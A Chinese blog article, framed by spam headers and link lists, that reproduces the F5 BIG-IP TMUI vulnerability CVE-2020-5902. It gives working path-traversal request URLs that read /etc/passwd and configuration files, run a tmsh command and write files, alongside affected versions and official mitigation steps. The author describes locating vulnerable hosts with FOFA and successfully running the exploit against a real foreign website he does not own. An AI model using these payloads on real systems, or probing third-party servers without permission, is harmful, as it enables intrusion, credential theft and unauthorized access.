91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何進行CVE-2020-5902簡單復現

發布時間:2021-12-27 18:41:31 來源:億速云 閱讀:175 作者:柒染 欄目:安全技術

如何進行CVE-2020-5902簡單復現,相信很多沒有經驗的人對此束手無策,為此本文總結了問題出現的原因和解決方法,通過這篇文章希望你能解決這個問題。

CVE-2020-5902 簡單復現

2020通報了f5的一個漏洞,想著先弄個環境保存著,說不定后面就用到了。

1、漏洞描述

近日,F5官方發布公告,修復了流量管理用戶界面(TMUI)中存在的一個遠程代碼執行漏洞(CVE-2020-5902)。此漏洞允許未經身份驗證的攻擊者或經過身份驗證的用戶通過BIG-IP管理端口和/或自身IP對TMUI進行網絡訪問,以執行任意系統命令、創建或刪除文件、禁用服務和/或執行任意Java代碼。該漏洞可能對整個系統造成危害。目前監測到網絡上已經有PoC,并且已有利用該漏洞的攻擊行為出現,建議用戶盡快升級進行防護。

F5 BIG-IP 是美國 F5 公司的一款集成了網絡流量管理、應用程序安全管理、負載均衡等功能的應用交付平臺。

參考鏈接:https://support.f5.com/csp/article/K52145254

2、受影響的版本

F5 BIG-IP 15.x 已知易受攻擊版本 15.1.0、15.0.0

F5 BIG-IP 14.x 已知易受攻擊版本 14.1.0-14.1.2

F5 BIG-IP 13.x 已知易受攻擊版本 13.1.0-13.1.3

F5 BIG-IP 12.x 已知易受攻擊版本 12.1.0-12.1.5

F5 BIG-IP 11.x 已知易受攻擊版本 11.6.1-11.6.5

3、漏洞POC
文件讀取:
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf

RCE:
https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

寫入文件:
https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/test&content=123456
4、復現

因為才公布出來幾天,所以網上還可以搜到許多漏洞版本的網站(其實感覺大多數site后面也不會修補。),這里嘗試搜了一下,發現還挺多,直接用國外的站點嘗試一下(畢竟自己搭環境還是挺麻煩的,但不知道搜到的具有漏洞的網站是不是蜜罐。。。)

用fofa搜一下漏洞版本:

如何進行CVE-2020-5902簡單復現

找到一個漂亮國的能正常訪問。測試一下下,發現能成功。

如何進行CVE-2020-5902簡單復現

如何進行CVE-2020-5902簡單復現

寫入文件:

如何進行CVE-2020-5902簡單復現

這里嘗試RCE列出用戶,沒有輸出

獲取shell網上也有文章寫到了,因為是真實網站,就不繼續嘗試了。:https://github.com/jas502n/CVE-2020-5902

自己搭個環境試試,版本為14.1.2,因為現在官網好像已經下不到漏洞版本了,網上隨便找了個別人下載的,但發現web頁面的賬號密碼好像被他改了(默認是admin/admin),不過不影響,也可以直接利用:

如何進行CVE-2020-5902簡單復現

如何進行CVE-2020-5902簡單復現

嘗試下msf,這里我剛開始使用的離線下載該模塊,然后手動添加到msf,但發現始終載入不了該模塊,最后也沒解決(應該是我的msf版本太低了,識別不到新模塊),這里其實新版本msf里就有該exp,不用手動添加,更新msf即可(這里遇到一個更新后msf無法啟動的問題,后面解決了,之后再總結一下吧)
如何進行CVE-2020-5902簡單復現

這里沒有成功。。后面再嘗試下(網上的文章全都一樣,只寫到了有這個模塊,沒有人說成功用exp拿到了shell。)

5、官方修復建議
通用修補建議:
升級到以下版本

BIG-IP 15.x: 15.1.0.4
BIG-IP 14.x: 14.1.2.6
BIG-IP 13.x: 13.1.3.4
BIG-IP 12.x: 12.1.5.2
BIG-IP 11.x: 11.6.5.2
臨時修補建議:
官方建議可以通過以下步驟臨時緩解影響

1) 使用以下命令登錄對應系統

tmsh
2) 編輯 httpd 組件的配置文件

edit /sys httpd all-properties
3) 文件內容如下

include '
<LocationMatch "...;.">
Redirect 404 /
</LocationMatch>
'
4) 按照如下操作保存文件

按下 ESC 并依次輸入
:wq
5) 執行命令刷新配置文件

save /sys config
6) 重啟 httpd 服務

restart sys service httpd
并禁止外部IP對 TMUI 頁面的訪問

看完上述內容,你們掌握如何進行CVE-2020-5902簡單復現的方法了嗎?如果還想學到更多技能或想了解更多相關內容,歡迎關注億速云行業資訊頻道,感謝各位的閱讀!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

乡城县| 喀喇沁旗| 高要市| 隆林| 长岛县| 青岛市| 周口市| 鲁山县| 夏津县| 灯塔市| 正定县| 岚皋县| 沾化县| 寻甸| 高唐县| 辽阳县| 仁化县| 临西县| 靖西县| 高台县| 太原市| 通州市| 龙山县| 英山县| 永德县| 保山市| 水城县| 宁乡县| 大英县| 昌邑市| 新乡县| 建平县| 凌源市| 永宁县| 布拖县| 崇阳县| 五河县| 旅游| 罗田县| 夏河县| 西林县|